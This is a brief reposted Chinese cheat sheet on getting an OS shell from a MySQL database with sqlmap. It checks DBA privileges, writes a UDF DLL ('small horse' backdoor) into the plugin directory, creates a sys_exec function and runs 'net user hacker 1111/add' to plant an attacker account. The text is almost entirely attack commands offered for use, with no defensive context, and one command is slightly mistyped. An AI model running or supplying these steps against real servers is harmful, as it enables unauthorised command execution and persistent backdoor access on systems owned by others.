转自
https://www.cnblogs.com/waw/p/10828237.html
方便以后查询
sqlmap 直连数据库拿shell
需要已知当前用户名 --current-user 密码账号 --password
查看dba权限--is-dba
执行--sql-shell
查看版本:select @@version;
查询插件目录:select @@plugin dir;
写入小马文件:sqlmap -d "mysql://root:root@ip:3306/mysql" --file-write=本地文件路径(小马文件:/home/udf.dll) --file-dest 网站路径(写入路径)+"/写入的文件名"(格式:D://phpStudy//PHPTutorial//MySQL//lib//plugin//lib_mysqludfsys.dll) 其实就是将本地文件写进去
进入shell:create function sys_exec returns strings soname "lib_mysqludfsys.dll";
select sys_exec('net user hacker 1111/add')
x后面输入命令即可